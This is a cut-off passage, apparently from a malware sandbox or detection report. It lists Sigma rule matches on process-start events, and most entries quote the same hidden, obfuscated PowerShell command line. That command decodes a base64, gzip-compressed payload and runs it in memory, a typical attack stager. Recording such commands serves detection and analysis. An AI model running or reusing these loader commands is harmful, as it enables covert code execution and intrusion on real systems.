AHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())), CommandLine: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB
          Source: Process startedAuthor: Hieu Tran: Data: Command: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())), CommandLine: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 